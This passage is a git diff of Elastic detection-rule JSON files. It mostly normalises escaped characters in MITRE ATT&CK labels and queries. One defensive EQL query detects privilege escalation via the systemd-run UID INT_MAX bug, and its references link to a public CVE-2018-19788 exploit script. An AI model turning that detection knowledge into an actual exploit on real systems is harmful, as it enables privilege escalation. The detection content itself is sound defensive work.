b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json index 3a77d565d42..89d9a559887 100644 --- a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_109.json @@ -55,7 +55,7 @@ ], "risk_score": 21, "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json index bd3d13deb0c..1ad3bbd930b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_4.json @@ -84,7 +84,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -99,7 +99,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json index fc98682d611..051aa9fcc69 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_5.json @@ -79,7 +79,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -94,7 +94,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json index a710a8c9a5a..668c785519d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json +++ b/packages/security_detection_engine/kibana/security_rule/d33ea3bf-9a11-463e-bd46-f648f2a0f4b1_6.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json b/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json index 5244cc63ac1..3d37bc08540 100644 --- a/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d3551433-782f-4e22-bbea-c816af2d41c6_1.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json index 0bce8001a2c..615f0f781fd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_102.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json index e0d2858dbd2..fc3760bc199 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_103.json @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json index 594389ab939..4345ffa93c9 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json index 5be3fd3893f..8f503d399a5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d461fac0-43e8-49e2-85ea-3a58fe120b4f_105.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json index 4855af2abf3..d8265223d8f 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_102.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json index 6a143b78790..4c92ad23700 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_103.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json index 75fef25d9e0..516b6ea7de6 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_104.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json index 390808e0445..51f9f61c4cf 100644 --- a/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json +++ b/packages/security_detection_engine/kibana/security_rule/d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f_205.json @@ -50,7 +50,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json index 40ae0679730..86f3feb71b4 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json index 42b3ce6f4a3..8d6e032a168 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json index 7a270b6ea6a..225b15aea7a 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d4af3a06-1e0a-48ec-b96a-faf2309fae46_103.json @@ -38,7 +38,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json index 12348520778..1883bbdb77e 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_101.json @@ -29,7 +29,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json index 1201e39827a..b88ba6515bd 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_102.json @@ -28,7 +28,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json index c4c7c20f556..c81e4f836f5 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d4b73fa0-9d43-465e-b8bf-50230da6718b_103.json @@ -42,7 +42,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0001", "name": "Initial Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json index d1fff9b12b5..787d1a2c97d 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_1.json @@ -34,7 +34,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json index a1fe5e8231b..34c8ab82eb3 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_2.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json index bb56431f87a..e75f3a8bd42 100644 --- a/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d4ff2f53-c802-4d2e-9fb9-9ecc08356c3f_3.json @@ -35,7 +35,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json index dd356a5a15a..e23b3e95760 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_1.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json index 7f5fae08cae..a43d3112d68 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_2.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json index 940130be05d..64e392e6965 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_3.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json index b76d2ad7cbc..9e22b5f94e2 100644 --- a/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/d55436a8-719c-445f-92c4-c113ff2f9ba5_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privilege Escalation via UID INT_MAX Bug Detected", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count \u003e= 3 and user.id \u003e= \"1000000000\"\n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"systemd-run\" and process.args == \"-t\" and process.args_count >= 3 and user.id >= \"1000000000\"\n", "references": [ "https://twitter.com/paragonsec/status/1071152249529884674", "https://github.com/mirchr/security-research/blob/master/vulnerabilities/CVE-2018-19788.sh", @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json index 709c4e01ece..e602c200cba 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_102.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json index 53779bc74c6..70f0a20d234 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json index 921a158712c..34ae0cd7fde 100644 --- a/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d563aaba-2e72-462b-8658-3e5ea22db3a6_104.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json index ddf06557941..9f155c1d004 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json index 8458e371cbc..8d782881017 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_103.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json index b40470a9dea..2aa4203c544 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_104.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json index b9c1a590137..59ede388de7 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_105.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json index c586f33e7b4..2534abf8363 100644 --- a/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json +++ b/packages/security_detection_engine/kibana/security_rule/d5d86bf5-cf0c-4c06-b688-53fdc072fdfd_206.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json index 7cadba3072b..af2558a5f0b 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_103.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json index 606d4b59fb5..a5ae8d6551e 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_104.json @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -109,7 +109,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json index 8c767012043..ad74e29bf6c 100644 --- a/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json +++ b/packages/security_detection_engine/kibana/security_rule/d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc_105.json @@ -73,7 +73,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", @@ -88,7 +88,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json b/packages/security_detection_engine/kibana/security_rule/d624f0ae-3dd1-4856-9aad-ccfe4d4bfa17_105.json index 2616f6da75f..43ac52eb161 100644 --- 